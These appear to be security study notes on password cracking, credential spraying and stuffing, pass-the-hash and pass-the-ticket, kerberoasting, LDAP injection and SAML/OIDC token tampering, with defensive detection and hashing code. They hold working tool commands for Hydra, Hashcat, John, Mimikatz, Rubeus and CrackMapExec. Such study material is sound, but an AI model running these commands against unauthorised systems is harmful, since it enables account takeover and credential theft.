# Core Lessons & Techniques

### 1. Password Attacks

#### Brute-Force

- **Definition:** Try every combination until the correct one is found
- **Tool:** Hydra
- **Command Example:**
    ```bash
    hydra -l jkelly -x 4:8:a1 \
          ssh://192.168.1.100
    ```
    - `-l jkelly` = username
    - `-x 4:8:a1` = generate passwords of length 4–8 from Hydra's charset codes: `a` = lowercase letters, `1` = digits (Hydra's `-x MIN:MAX:CHARSET` syntax uses these codes rather than a spelled-out alphabet)

#### Dictionary
- **Definition:** Use wordlists of common passwords
- **Tool:** John the Ripper
- **Command Example:**
    ```bash
    # wordlist only, no mutations (adding --rules turns this into the hybrid attack below)
    john --wordlist=/usr/share/wordlists/rockyou.txt \
         --format=raw-md5 hash_file.txt
    ```

#### Hybrid
- **Definition:** Dictionary + brute-force mutations
- **Command Example:**
    ```bash
    # --rules applies John's mangling rules (case changes, appended digits/symbols) to every word
    john --wordlist=/usr/share/wordlists/rockyou.txt \
         --rules --format=raw-md5 samplehashfile.txt
    ```

#### Rainbow-Table

- **Definition:** Precomputed hash→plaintext lookup
- **Tool:** Hashcat
- **Command Example:**
    ```bash
    hashcat -m 0 -a 0 -o cracked.txt hashes.txt \
             /usr/share/wordlists/rockyou.txt
    ```
- **Caveat:** Hashcat does not load rainbow tables; `-a 0` is a straight wordlist attack against unsalted MD5 (`-m 0`), so the command above is a dictionary attack in practice. Precomputed tables only work against unsalted hashes, which is why per-user salting (see Strengthening Hash Storage) defeats them.

---

### 2. Credential Attacks

#### Password Spraying

- **Definition:** Try one common password against many accounts
- **Tool:** CrackMapExec
- **Command Example:**
    ```bash
    crackmapexec smb 192.168.1.0/24 \
      -u users.txt -p 'Summer2024!'
    ```
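
As an added defender-side example (not part of the original notes), a sliding-window detector for the spraying pattern described above: one source failing against many distinct accounts in a short window, with the single success it was looking for. The log format and IPs are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (made-up format, not from any real system): one
# source tries one password against many accounts; another is a single user
# mistyping their own password, which should not be flagged.
SAMPLE_LOG = """\
2024-06-01T09:00:01Z auth=fail user=alice src=10.10.8.15
2024-06-01T09:00:02Z auth=fail user=bob src=10.10.8.15
2024-06-01T09:00:03Z auth=fail user=carol src=10.10.8.15
2024-06-01T09:00:04Z auth=fail user=dave src=10.10.8.15
2024-06-01T09:00:05Z auth=ok   user=erin src=10.10.8.15
2024-06-01T09:00:06Z auth=fail user=frank src=10.10.8.15
2024-06-01T09:01:00Z auth=fail user=alice src=10.10.9.40
2024-06-01T09:01:30Z auth=fail user=alice src=10.10.9.40
2024-06-01T09:02:00Z auth=ok   user=alice src=10.10.9.40
"""

LINE_RE = re.compile(r"^(\S+) auth=(\w+)\s+user=(\S+) src=(\S+)$")

def parse(log_text):
    """Yield (timestamp, outcome, user, src) tuples; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m.group(2), m.group(3), m.group(4)

def detect_spray(log_text, min_users=5, window=timedelta(minutes=10)):
    """Return {src: {"users": [...], "succeeded": [...]}} for every source whose
    failures cover at least min_users distinct accounts inside one sliding window.
    Spraying 'succeeds' at most once per password, so the success is reported too."""
    fails = defaultdict(list)
    successes = defaultdict(set)
    for ts, outcome, user, src in parse(log_text):
        if outcome == "fail":
            fails[src].append((ts, user))
        elif outcome == "ok":
            successes[src].add(user)
    alerts = {}
    for src, events in fails.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            users = {u for t, u in events[i:] if t - start <= window}
            if len(users) >= min_users:
                alerts[src] = {"users": sorted(users), "succeeded": sorted(successes[src])}
                break
    return alerts
```

The threshold and window are tuning knobs: a lockout policy that counts failures per account never sees this pattern, because each account only fails once.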

#### Password Masking
- **Definition:** Mask-based attack fitting known password patterns
- **Tool:** Hashcat
- **Command Example:**
    ```bash
    # -a 3 = mask attack, -m 0 = raw MD5
    # ?u = uppercase, ?l = lowercase, ?d = digit, ?s = special character,
    # so '?u?l?l?l?l?d?d?s' covers patterns like Hello24!
    hashcat -a 3 -m 0 hashfile.txt \
      '?u?l?l?l?l?d?d?s'
    ```

#### Credential Stuffing

- **Definition:** Replay breached username/password pairs
- **Tool:** Hydra
- **Command Example:**
    ```bash
    # <target-host> is a placeholder: hydra needs the host before the module name
    # (the original line omitted it); F=incorrect marks the failed-login response
    hydra -L usernames.txt -P passwords.txt <target-host> \
          http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
    ```

#### MFA Fatigue

- **Definition:** Flood user with MFA prompts until they approve
- **Prevention:**
    - Use push-binding MFA (only one prompt per login)
    - Train users to deny unexpected prompts

---

### 3. Credential-Passing Attacks

#### Pass-the-Hash
- **Definition:** Use NTLM hash in place of password
- **Tool:** Mimikatz + CrackMapExec
- **Commands:**
    ```powershell
    # Extract hashes (inside the mimikatz console)
    mimikatz # sekurlsa::logonpasswords
    # Use the NT hash to authenticate over SMB (CrackMapExec, from the attacking host).
    # <username> and <NT_hash> are placeholders; the original showed '' as the user and
    # aad3b435b51404eeaad3b435b51404ee, which is the LM half of an empty password, not an NT hash
    crackmapexec smb 10.0.0.5 -u <username> -H <NT_hash>
    ```

#### Pass-the-Ticket
- **Definition:** Reuse Kerberos TGTs/TGSs for SSO
- **Tools:** Mimikatz + Impacket
- **Commands:**
    ```powershell
    # Export tickets from the current session (mimikatz console); writes .kirbi files
    mimikatz # kerberos::list /export
    # Impacket psexec with the ticket: -k = Kerberos auth, -no-pass = no password prompt.
    # Impacket reads the ticket from the ccache named in KRB5CCNAME (convert .kirbi with ticketConverter.py)
    psexec.py -k -no-pass DOMAIN/user@10.0.0.5
    ```

#### Pass-the-Token
- **Definition:** Steal and reuse JWT/OAuth tokens
- **Usage:**
    ```http
    GET /api/data HTTP/1.1
    Host: example.com
    Authorization: Bearer <stolen_JWT_token>
    ```

---

### 4. Directory Service Attacks

#### Kerberos

- **Kerberoasting:** Crack service account hashes offline
- **Tool:** Rubeus or Mimikatz + Hashcat
- **Command Example (Rubeus):**
    ```powershell
    Rubeus.exe kerberoast /outfile:kerberoast_hashes.txt
    ```
- **Prevention:** Strong service-account passwords, AS-REP hardening

#### LDAP Injection

- **Definition:** Inject malicious filter into LDAP queries
- **Example:**
    ```
    (&(uid=*)(!(uid=*)(|(uid=*)(pthread*))))
    ```
- **Prevention:** Input validation, parameterized LDAP calls

---

### 5. Automated Attack Frameworks

#### CrackMapExec (CME)

- **Functions:** SMB auth, hash/ticket relay, command exec
- **Example Commands:**
    ```bash
    # Validate creds across network
    cme smb 192.168.1.0/24 -u users.txt -p passwords.txt

    # Execute ipconfig remotely
    cme smb 10.0.0.5 -u 'admin' -p 'P@ssw0rd' -x 'ipconfig'
    ```

CrackMapExec is no longer actively maintained, so it is highly suggested to use Rubeus instead in the future.

#### SAML Attacks

- SAML is the application-layer standard used to enable single sign-on (SSO)
- **Token Manipulation:** Modify `<Attribute>` elements in the SAML assertion
    - **Tool:** SAML Raider (Burp extension)
- **SAML Replay Attack:** Intercept a SAML response and reuse it for access
- **SAML Injection Attacks:** Exploit vulnerabilities in the application that processes SAML tokens
    1. Edit `<saml:Attribute Name="Role">user</…>` to `admin`
    2. Re-sign and forward
- **Prevention:**
    - Always validate and sanitize user inputs & SAML tokens
    - Use parameterized queries
    - Enforce strict XML schema validation
    - Ensure tokens have short lifetimes & reject tokens that have already been accepted (replay)

#### OpenID Connect (OIDC) Attacks

- Based on the OAuth 2.0 protocol to verify the identity of end users (SSO)
- **ID Token Manipulation:** Flip `"admin":false` to `"admin":true`
    - **Tool:** Burp + custom JWT editor
    - **Prevention:**
        - Verify the token signature with the OP's public key
        - Check the `nonce`, `aud` and `exp` claims
- **ID Token Replay Attack:** Capture a token and reuse it for access
- **ID Token Injection:** Exploit vulnerabilities in the application that processes the tokens itself
- **WebFinger Service:** Gather information about users or resources
    - Common endpoint: `/.well-known/webfinger`
    - **Prevention:** Restrict access to these endpoints & monitor queries
- **SSRF via Dynamic Client Registration:** Conduct an SSRF by manipulating registration requests to make the server give out data
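
The ID-token checks listed under Prevention, as an added example written for these notes (not the page's own code): verify the signature before reading any claim, pin the algorithm, then check `exp`, `aud` and `nonce`. It assumes a constructed HS256 key so it runs with the standard library; a real OP signs with RS256/ES256 and you verify against its JWKS public key, but the claim logic is the same.

```python
import base64, hashlib, hmac, json, time

# Constructed demo key (not a real OP key); stands in for the OP's JWKS public key
# so the example runs offline with the standard library.
DEMO_KEY = b"constructed-demo-signing-key"

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def sign_hs256(claims: dict, key: bytes) -> str:
    """Mint a token the way the OP would (used here only to build test input)."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(claims).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"

def verify_id_token(token: str, key: bytes, expected_aud: str, expected_nonce: str, now=None):
    """Return (True, claims) or (False, reason). The signature is checked before
    any claim is read, so a tampered payload is never trusted even partially."""
    parts = token.split(".")
    if len(parts) != 3:
        return False, "malformed token"
    header_b64, body_b64, sig_b64 = parts
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":   # pin the algorithm; never honour alg=none from the token
        return False, "unexpected alg"
    expected = hmac.new(key, f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return False, "bad signature"
    claims = json.loads(b64url_decode(body_b64))
    now = time.time() if now is None else now
    if claims.get("exp", 0) <= now:
        return False, "expired"
    if claims.get("aud") != expected_aud:          # token issued for a different client
        return False, "wrong audience"
    if claims.get("nonce") != expected_nonce:      # nonce binds the token to this login attempt
        return False, "nonce mismatch"
    return True, claims

def tamper(token: str, **changes) -> str:
    """Re-encode the payload with edited claims but keep the original signature:
    what flipping "admin":false to true in a JWT editor produces."""
    header_b64, body_b64, sig_b64 = token.split(".")
    claims = json.loads(b64url_decode(body_b64))
    claims.update(changes)
    return f"{header_b64}.{b64url(json.dumps(claims).encode())}.{sig_b64}"
```

Note that `aud` may also be a JSON array in real tokens; a production verifier accepts the token when its client ID is one of the listed audiences.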


---

### 6. Hash-Based Attacks

#### Collision (Birthday) Attacks

- **Definition:** Find two inputs with the same hash
- **Tool:** Hashcat
- **Example:**
    ```bash
    hashcat -m 0 -a 3 -o collisions.txt hash.txt '?a?a?a?a?a'
    ```
- **Caveat:** The command above is a 5-character mask brute-force against a given MD5 hash (a preimage search), not a collision search; Hashcat does not generate colliding inputs. The birthday bound is what makes collisions cheap: roughly 2^(n/2) attempts for an n-bit hash, which is why MD5 and SHA-1 are unsuitable wherever collision resistance matters.

#### Strengthening Hash Storage

- **Salting:** Unique per-user random salt →
    ```
    salt = random per-user bytes (stored next to the hash)
    hash = PBKDF2(password, salt, iterations=100_000)
    ```
    (PBKDF2 takes the password and the salt as separate inputs; the salt is not concatenated onto the password by hand)
- **Key Stretching:** Deliberately slow, iterated hashing so each guess costs more compute
    - **Examples:** PBKDF2 / bcrypt / scrypt for CPU hardness
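
The salting and key-stretching scheme above, as an added example written for these notes (not the page's own code): PBKDF2-HMAC-SHA256 with a fresh random salt per user and the 100,000 iterations the notes give, stored in a self-describing string so the verifier can read back the salt and iteration count, compared in constant time. The storage format (`pbkdf2_sha256$iterations$salt$digest`) is an assumption for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000   # as in the notes; raise it as hardware gets faster
SALT_BYTES = 16

def hash_password(password: str, salt: bytes = None, iterations: int = ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$iterations$salt_hex$digest_hex'. The salt is fresh
    random bytes per user unless one is passed in (only for deterministic tests);
    storing it alongside the digest is what lets verify_password recompute it."""
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"

def verify_password(password: str, stored: str) -> bool:
    """Recompute PBKDF2 with the stored salt/iterations and compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iterations, salt_hex, digest_hex = parts
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    # compare_digest: timing must not leak how many bytes of the digest matched
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))

def same_password_distinct_hashes(password: str) -> bool:
    """Why salting defeats rainbow tables: two users with the same password get
    different stored values, so one precomputed table cannot cover both."""
    return hash_password(password) != hash_password(password)
```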